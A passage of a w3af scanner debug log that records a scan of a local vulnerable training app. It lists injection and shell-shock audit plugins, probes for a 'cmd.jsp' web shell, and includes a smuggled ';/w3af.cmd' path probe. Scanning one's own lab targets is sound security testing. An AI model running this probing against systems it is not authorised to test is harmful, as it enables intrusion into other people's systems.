uri="http://localhost:9090/") [Wed Feb 12 09:36:51 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:51 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:X3XdX1kp) [Wed Feb 12 09:36:51 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 09:36:51 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 09:36:51 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a9_vuln_component" [Wed Feb 12 09:36:51 2020 - debug] finger_bing.discover(http://localhost:9090/cmd.jsp, did=nEqanZVO) [Wed Feb 12 09:36:51 2020 - debug] The infrastructure plugin: "finger_bing" wont be run anymore. [Wed Feb 12 09:36:51 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:51 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:51 2020 - debug] finger_bing.discover(did="nEqanZVO",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:51 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=682,from_cache=0,grep=1,rtt=0.08,did=c0UiZ8h7) [Wed Feb 12 09:36:51 2020 - debug] "http://localhost:9090/" (id:682, code:302, len:28, did:c0UiZ8h7) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:36:51 2020 - debug] open_api.discover(did="c0UiZ8h7",uri="http://localhost:9090/") took 10.37s to run (8.32s 80% sending HTTP requests) [Wed Feb 12 09:36:51 2020 - debug] response_splitting.audit(did="EtLpg8qo", uri="http://localhost:9090/") [Wed Feb 12 09:36:51 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:51 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:36:51 2020 - debug] mx_injection.audit(did="X3XdX1kp",uri="http://localhost:9090/") took 0.10s to run [Wed Feb 12 09:36:51 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/a9_vuln_component" [Wed Feb 12 09:36:51 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/a9_vuln_component" [Wed Feb 12 09:36:51 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=683,from_cache=0,grep=1,rtt=0.04,did=QkhjpaUC) [Wed Feb 12 09:36:51 2020 - debug] "http://localhost:9090/learn" (id:683, code:200, len:10863, did:QkhjpaUC) is NOT a 404 [URL 404 cache] [Wed Feb 12 09:36:51 2020 - debug] finger_pks.discover(http://localhost:9090/cmd.jsp, did=wod4T4sR) [Wed Feb 12 09:36:51 2020 - debug] The infrastructure plugin: "finger_pks" wont be run anymore. [Wed Feb 12 09:36:51 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:51 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:51 2020 - debug] finger_pks.discover(did="wod4T4sR",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:51 2020 - debug] genexus_xml.discover(http://localhost:9090/cmd.jsp, did=yGLo44Iu) [Wed Feb 12 09:36:51 2020 - debug] [genexus_xml] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:51 2020 - debug] The crawl plugin: "genexus_xml" wont be run anymore. [Wed Feb 12 09:36:51 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:51 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:51 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:EtLpg8qo) [Wed Feb 12 09:36:51 2020 - debug] open_api.discover(did="QkhjpaUC",uri="http://localhost:9090/learn") took 0.48s to run (0.04s 9% sending HTTP requests) [Wed Feb 12 09:36:51 2020 - debug] rfd.audit(did="ce7Yzlea", uri="http://localhost:9090/") [Wed Feb 12 09:36:51 2020 - debug] finger_google.discover(http://localhost:9090/cmd.jsp, did=e70HkbJZ) [Wed Feb 12 09:36:51 2020 - debug] The infrastructure plugin: "finger_google" wont be run anymore. [Wed Feb 12 09:36:51 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:51 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:51 2020 - debug] finger_google.discover(did="e70HkbJZ",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:51 2020 - debug] response_splitting.audit(did="EtLpg8qo",uri="http://localhost:9090/") took 0.04s to run [Wed Feb 12 09:36:51 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/ax_redirect" [Wed Feb 12 09:36:51 2020 - debug] rfi.audit(did="LkYgJtjC", uri="http://localhost:9090/") [Wed Feb 12 09:36:51 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/%3B/w3af.cmd%3B/w3af.cmd" () [Wed Feb 12 09:36:51 2020 - debug] dot_listing.discover(http://localhost:9090/cmd.jsp, did=n8rva0Zx) [Wed Feb 12 09:36:51 2020 - debug] [dot_listing] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:51 2020 - debug] genexus_xml.discover(did="yGLo44Iu",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:51 2020 - debug] rfd.audit(did="ce7Yzlea",uri="http://localhost:9090/") took 0.05s to run [Wed Feb 12 09:36:51 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 09:36:51 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: un0re8mf) [Wed Feb 12 09:36:51 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/ax_redirect" [Wed Feb 12 09:36:51 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/ax_redirect" [Wed Feb 12 09:36:51 2020 - debug] frontpage.audit(did="z8UQKGpk", uri="http://localhost:9090/") [Wed Feb 12 09:36:51 2020 - debug] wordpress_fingerprint.discover(http://localhost:9090/cmd.jsp, did=ttU8ji2h) [Wed Feb 12 09:36:51 2020 - debug] [wordpress_fingerprint] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:51 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a4_xxe" [Wed Feb 12 09:36:51 2020 - debug] content_negotiation.discover(http://localhost:9090/cmd.jsp, did=uvlkqo7q) [Wed Feb 12 09:36:51 2020 - debug] [content_negotiation] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:51 2020 - debug] dot_listing.discover(did="n8rva0Zx",uri="http://localhost:9090/cmd.jsp") took 0.03s to run [Wed Feb 12 09:36:51 2020 - debug] robots_txt.discover(http://localhost:9090/cmd.jsp, did=BIh5qfWP) [Wed Feb 12 09:36:51 2020 - debug] [robots_txt] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:51 2020 - debug] The crawl plugin: "robots_txt" wont be run anymore. [Wed Feb 12 09:36:51 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:51 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:51 2020 - debug] robots_txt.discover(did="BIh5qfWP",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:51 2020 - debug] frontpage.audit(did="z8UQKGpk",uri="http://localhost:9090/") took 0.03s to run [Wed Feb 12 09:36:51 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:51 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:LkYgJtjC) [Wed Feb 12 09:36:51 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/a4_xxe" [Wed Feb 12 09:36:51 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/a4_xxe" [Wed Feb 12 09:36:51 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a2_broken_auth" [Wed Feb 12 09:36:51 2020 - debug] RFI using local web server for URL: http://localhost:9090/ [Wed Feb 12 09:36:51 2020 - debug] archive_dot_org.discover(http://localhost:9090/cmd.jsp, did=WAttDmMv) [Wed Feb 12 09:36:51 2020 - debug] [archive_dot_org] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:52 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=684,from_cache=1,grep=1,rtt=0.17,did=3meC1IMl) [Wed Feb 12 09:36:52 2020 - debug] server_header.discover(did="0Kso9Q5T",uri="http://localhost:9090/cmd.jsp") took 0.31s to run [Wed Feb 12 09:36:52 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/a2_broken_auth" [Wed Feb 12 09:36:52 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/a2_broken_auth" [Wed Feb 12 09:36:52 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" [Wed Feb 12 09:36:52 2020 - debug] GET http://localhost:9090/cmd returned HTTP code "404" (id=686,from_cache=0,grep=1,rtt=0.08,did=PYosAaw5) [Wed Feb 12 09:36:52 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=688,from_cache=0,grep=0,rtt=0.17,did=un0re8mf) [Wed Feb 12 09:36:52 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: un0re8mf) [Wed Feb 12 09:36:52 2020 - debug] detailed._login() took 0.29s to run [Wed Feb 12 09:36:52 2020 - debug] ria_enumerator.discover(http://localhost:9090/cmd.jsp, did=zhAQw2dz) [Wed Feb 12 09:36:52 2020 - debug] [ria_enumerator] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:52 2020 - debug] The crawl plugin: "ria_enumerator" wont be run anymore. [Wed Feb 12 09:36:52 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:52 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:52 2020 - debug] ria_enumerator.discover(did="zhAQw2dz",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:52 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=151 returned HTTP code "200" (id=685,from_cache=0,grep=0,rtt=0.71,did=3Sbo6R4Z) [Wed Feb 12 09:36:52 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:52 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:LkYgJtjC) [Wed Feb 12 09:36:52 2020 - debug] GET http://localhost:9090/logout returned HTTP code "302" (id=687,from_cache=0,grep=0,rtt=0.15,did=tv0rDE9u) [Wed Feb 12 09:36:52 2020 - debug] file_upload.audit(did="oMJqIFMt", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:52 2020 - debug] file_upload.audit(did="oMJqIFMt",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:52 2020 - debug] rfi.audit(did="LkYgJtjC",uri="http://localhost:9090/") took 0.34s to run [Wed Feb 12 09:36:52 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" [Wed Feb 12 09:36:52 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/a3_sensitive_data" [Wed Feb 12 09:36:53 2020 - debug] wordnet.discover(http://localhost:9090/cmd.jsp, did=LVAPaZfI) [Wed Feb 12 09:36:53 2020 - debug] [wordnet] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:53 2020 - debug] csrf.audit(did="rBZ3WY3i", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] csrf.audit(did="rBZ3WY3i",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:53 2020 - information] The remote Web server has Content Negotiation disabled [Wed Feb 12 09:36:53 2020 - debug] content_negotiation.discover(did="uvlkqo7q",uri="http://localhost:9090/cmd.jsp") took 0.44s to run [Wed Feb 12 09:36:53 2020 - debug] deserialization.audit(did="Eb62WTQI", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" [Wed Feb 12 09:36:53 2020 - debug] GET http://localhost:9090/wp-login.php returned HTTP code "404" (id=689,from_cache=1,grep=1,rtt=0.18,did=n1zjXyQl) [Wed Feb 12 09:36:53 2020 - debug] deserialization.audit(did="Eb62WTQI",uri="http://localhost:9090/logout") took 0.03s to run [Wed Feb 12 09:36:53 2020 - debug] os_commanding.audit(did="LjRIdfP4", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:LjRIdfP4) [Wed Feb 12 09:36:53 2020 - debug] wordpress_fingerprint.discover(did="ttU8ji2h",uri="http://localhost:9090/cmd.jsp") took 0.50s to run [Wed Feb 12 09:36:53 2020 - debug] sitemap_xml.discover(http://localhost:9090/cmd.jsp, did=bBfS3Z2V) [Wed Feb 12 09:36:53 2020 - debug] [sitemap_xml] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:53 2020 - debug] The crawl plugin: "sitemap_xml" wont be run anymore. [Wed Feb 12 09:36:53 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:53 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:53 2020 - debug] sitemap_xml.discover(did="bBfS3Z2V",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] lfi.audit(did="bSzXnoxu", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:bSzXnoxu) [Wed Feb 12 09:36:53 2020 - debug] lfi.audit(did="bSzXnoxu",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] os_commanding.audit(did="LjRIdfP4",uri="http://localhost:9090/logout") took 0.04s to run [Wed Feb 12 09:36:53 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/a5_broken_access_control" [Wed Feb 12 09:36:53 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/a5_broken_access_control" [Wed Feb 12 09:36:53 2020 - debug] user_dir.discover(http://localhost:9090/cmd.jsp, did=jxysLhin) [Wed Feb 12 09:36:53 2020 - debug] [user_dir] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:53 2020 - debug] The crawl plugin: "user_dir" wont be run anymore. [Wed Feb 12 09:36:53 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:53 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:53 2020 - debug] user_dir.discover(did="jxysLhin",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] sqli.audit(did="vtuRW9LM", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:vtuRW9LM) [Wed Feb 12 09:36:53 2020 - debug] OrderedCachedQueue.put() will write a 'FuzzableRequest' item to the CrawlInfraIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current CrawlInfraIn DiskDict size is 0. [Wed Feb 12 09:36:53 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=690,from_cache=1,grep=1,rtt=0.11,did=CaZWKuhw) [Wed Feb 12 09:36:53 2020 - debug] dir_file_bruter.discover(http://localhost:9090/cmd.jsp, did=BzWsbSsW) [Wed Feb 12 09:36:53 2020 - debug] [dir_file_bruter] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:53 2020 - debug] The crawl plugin: "dir_file_bruter" wont be run anymore. [Wed Feb 12 09:36:53 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:53 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:53 2020 - debug] dir_file_bruter.discover(did="BzWsbSsW",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] blind_sqli.audit(did="wpsWZjlf", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] blind_sqli.audit(did="wpsWZjlf",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] phpinfo.discover(http://localhost:9090/cmd.jsp, did=bOXx8W9f) [Wed Feb 12 09:36:53 2020 - debug] sqli.audit(did="vtuRW9LM",uri="http://localhost:9090/logout") took 0.03s to run [Wed Feb 12 09:36:53 2020 - debug] get_emails.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.84s to run [Wed Feb 12 09:36:53 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] phishing_vector.audit(did="r1tqlTGm", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:r1tqlTGm) [Wed Feb 12 09:36:53 2020 - debug] find_dvcs.discover(http://localhost:9090/cmd.jsp, did=1TSzliad) [Wed Feb 12 09:36:53 2020 - debug] [phpinfo] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:53 2020 - debug] error_pages.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.06s to run [Wed Feb 12 09:36:53 2020 - debug] strange_reason.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] cache_control.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] strange_headers.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] ssn.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] oracle.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] feeds.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] Finished audit.phishing_vector (did=r1tqlTGm) [Wed Feb 12 09:36:53 2020 - debug] phishing_vector.audit(did="r1tqlTGm",uri="http://localhost:9090/logout") took 0.03s to run [Wed Feb 12 09:36:53 2020 - debug] generic.audit(did="wcl42r8P", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] generic.audit(did="wcl42r8P",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] [find_dvcs] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:53 2020 - debug] find_dvcs.discover(did="1TSzliad",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] import_results.discover(http://localhost:9090/cmd.jsp, did=mgIuX3ek) [Wed Feb 12 09:36:53 2020 - debug] [import_results] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:53 2020 - debug] The crawl plugin: "import_results" wont be run anymore. [Wed Feb 12 09:36:53 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:53 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:53 2020 - debug] import_results.discover(did="mgIuX3ek",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] phpinfo.discover(did="bOXx8W9f",uri="http://localhost:9090/cmd.jsp") took 0.05s to run [Wed Feb 12 09:36:53 2020 - debug] url_fuzzer.discover(http://localhost:9090/cmd.jsp, did=XsWRvHqM) [Wed Feb 12 09:36:53 2020 - debug] [url_fuzzer] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:53 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.04s to run [Wed Feb 12 09:36:53 2020 - debug] payment_webhook_finder.discover(http://localhost:9090/cmd.jsp, did=KXmpV1uX) [Wed Feb 12 09:36:53 2020 - debug] [payment_webhook_finder] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:53 2020 - debug] format_string.audit(did="btLLeEIp", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:btLLeEIp) [Wed Feb 12 09:36:53 2020 - debug] websocket_hijacking.audit(did="Rp0DkaKO", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] OrderedCachedQueue.put() will write a 'FuzzableRequest' item to the CrawlInfraIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current CrawlInfraIn DiskDict size is 1. [Wed Feb 12 09:36:53 2020 - debug] websocket_hijacking.audit(did="Rp0DkaKO",uri="http://localhost:9090/logout") took 0.01s to run [Wed Feb 12 09:36:53 2020 - debug] shell_shock.audit(did="wOOxq3c0", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] format_string.audit(did="btLLeEIp",uri="http://localhost:9090/logout") took 0.02s to run [Wed Feb 12 09:36:53 2020 - debug] memcachei.audit(did="rdke0baI", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:rdke0baI) [Wed Feb 12 09:36:53 2020 - debug] memcachei.audit(did="rdke0baI",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] symfony.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] un_ssl.audit(did="BlcCk7q3", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] un_ssl.audit(did="BlcCk7q3",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] ldapi.audit(did="yKfw1tQp", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:53 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:53 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:yKfw1tQp) [Wed Feb 12 09:36:53 2020 - debug] file_upload.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:36:53 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:36:54 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:36:54 2020 - debug] ldapi.audit(did="yKfw1tQp",uri="http://localhost:9090/logout") took 0.05s to run [Wed Feb 12 09:36:54 2020 - debug] OrderedCachedQueue.put() will write a 'FuzzableRequest' item to the CrawlInfraIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current CrawlInfraIn DiskDict size is 2. [Wed Feb 12 09:36:54 2020 - debug] buffer_overflow.audit(did="4F6H2Xbz", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:54 2020 - debug] redos.audit(did="z7IKtnbX", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:54 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:54 2020 - debug] buffer_overflow.audit(did="4F6H2Xbz",uri="http://localhost:9090/logout") took 0.05s to run [Wed Feb 12 09:36:54 2020 - debug] global_redirect.audit(did="Z3VuuJ1k", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:54 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:54 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Z3VuuJ1k) [Wed Feb 12 09:36:54 2020 - debug] GET http://localhost:9090/logout returned HTTP code "302" (id=691,from_cache=0,grep=1,rtt=0.07,did=wOOxq3c0) [Wed Feb 12 09:36:54 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:54 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:54 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Z3VuuJ1k) [Wed Feb 12 09:36:54 2020 - debug] xpath.audit(did="AAfpLQgW", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:54 2020 - debug] OrderedCachedQueue.put() will write a 'FuzzableRequest' item to the CrawlInfraIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current CrawlInfraIn DiskDict size is 3. [Wed Feb 12 09:36:54 2020 - debug] redos.audit(did="z7IKtnbX",uri="http://localhost:9090/logout") took 0.12s to run [Wed Feb 12 09:36:54 2020 - debug] global_redirect.audit(did="Z3VuuJ1k",uri="http://localhost:9090/logout") took 0.09s to run [Wed Feb 12 09:36:54 2020 - debug] cors_origin.audit(did="rdrGFmgO", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:54 2020 - debug] htaccess_methods.audit(did="8fZvqazX", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:54 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=692,from_cache=0,grep=1,rtt=0.06,did=jRzBntkJ) [Wed Feb 12 09:36:54 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:54 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:AAfpLQgW) [Wed Feb 12 09:36:54 2020 - debug] xpath.audit(did="AAfpLQgW",uri="http://localhost:9090/logout") took 0.17s to run [Wed Feb 12 09:36:54 2020 - debug] http_in_body.grep(uri="http://localhost:9090/filesInCache.json") took 0.41s to run [Wed Feb 12 09:36:54 2020 - debug] dav.audit(did="sf9wWbKz", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:54 2020 - debug] dav.audit(did="sf9wWbKz",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:54 2020 - debug] OrderedCachedQueue.put() will write a 'FuzzableRequest' item to the CrawlInfraIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current CrawlInfraIn DiskDict size is 4. [Wed Feb 12 09:36:54 2020 - debug] expect_ct.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:36:54 2020 - debug] svn_users.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:36:54 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:36:54 2020 - debug] private_ip.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:36:54 2020 - debug] motw.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:36:54 2020 - debug] meta_generator.grep(uri="http://localhost:9090/filesInCache.json") took 0.00s to run [Wed Feb 12 09:36:54 2020 - debug] GET http://localhost:9090/logout returned HTTP code "302" (id=696,from_cache=0,grep=1,rtt=0.05,did=SSUbEjdm) [Wed Feb 12 09:36:54 2020 - debug] htaccess_methods.audit(did="8fZvqazX",uri="http://localhost:9090/logout") took 0.27s to run [Wed Feb 12 09:36:54 2020 - debug] GET http://localhost:9090/logout returned HTTP code "302" (id=693,from_cache=0,grep=1,rtt=0.09,did=rdrGFmgO) [Wed Feb 12 09:36:54 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=161 returned HTTP code "200" (id=694,from_cache=0,grep=0,rtt=0.66,did=BPMDXrj1) [Wed Feb 12 09:36:54 2020 - debug] GET http://web.archive.org/web/*/http:/localhost:9090/cmd.jsp 